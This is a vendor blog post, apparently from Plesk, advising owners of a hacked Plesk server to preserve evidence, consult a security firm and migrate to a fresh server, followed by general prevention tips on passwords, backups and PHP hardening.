Help – My Plesk server was hacked!
Servers are the core for business operations as they store data, manage mail and contacts, apps, files and more. They are important – but not impenetrable, and hence, can fall victim to hackers. This means it is no longer under your control, and this spells trouble on so many levels. But what to do if your Plesk server is hacked? Follow this guide and find out.
Consequences of Server Hacking
This results in a server that is partially controlled by someone else with the intent of using it for their own purposes. They may send out spam to the contacts you have saved on your server. Or they can launch attacks against other servers and attempt to gain access to highly sensitive information.
The ramifications of a hacked server can be quite disastrous for businesses. Because they can easily lose access to their company and client data, disrupting operations. Moreover, a hacked server might lead to lack of trust and confidence coming from clients and investors. The good news is that, while your Plesk server can potentially be hacking victim, there are steps you can take in the event of this scenario.
Identifying the way your server was hacked
Migrating to a new server is an important first step, but users also need to be aware of how the first attack happened. So that they can mitigate future attacks. Third-party solutions that search for rootkits or malware provides the scanning based on known malware. But they can sometimes miss the predators that they were never able to detect before. As a result, the report will become inaccurate.
The first thing is to not make any changes on the server before an investigation starts. This is because it will help you to avoid losing traces and evidence. Hence, we recommend you contact a security company which specializes in cases of server hacking. They can lend their expertise on the matter and help you solve the situation faster.
What to do if your server has been hacked
In case of hacking, we always recommend migrating all the contents of your existing server to a new one. The main reason for this is because the attacker would have raised their privileges within your server to the root level. This they can do using malicious software, which grants them access to basically anything they want.
You may even hire someone to find some rootkits or malware during the investigation and subsequently clean up. However, there’s no guarantee that there will be absolutely no others left behind. Malware can load onto RAM, or maybe some backdoors become enabled. Cronjobs can have a task to download a malicious software.
Some users may argue that you can actually restore the server to a time before the attack. But we think that this doesn’t really guarantee a clean server, since it was compromised to begin with. Because this means the malware uploaded to the server, or is somewhere dormant, ready to become active. Therefore, a clean slate is the best possible course of action in order to eliminate any doubts about future attacks.
Preventing future attacks
If you do contact a security company, they can give you a comprehensive list of things you can do to prevent future attacks. And hence, ensure that you have a secure Plesk server.
One of the most common solutions is using stronger passwords. These obviously give better protection for your administration accounts. If you’re unsure about how to create strong passwords, you can find several free online tools that measure password strength.
Also, we recommend that you change the passwords for key access points every specific period. Like three three months, for example, in order to add an extra layer of security.
Maintaining regular backups of your data on a scheduled basis is another important step. If a domain becomes compromised, it can go unnoticed for some time. So backing up data allows you to restore your service from a clean backup.
Finally, we advise you to strengthen your PHP settings, because this will greatly increase the security of your service.
Businesses heavily depend on computers to maintain their operations. And yet, most of these companies never fully prepare for when something affects their servers. So, these are just a few simple changes you can make in order to reduce the possibility of an attack from a malicious third party. Start preventing possible damage to your business, profits and reputation.
Oh no, sorry about that!
Let us know how we can do better below
Tell us how we can improve this post?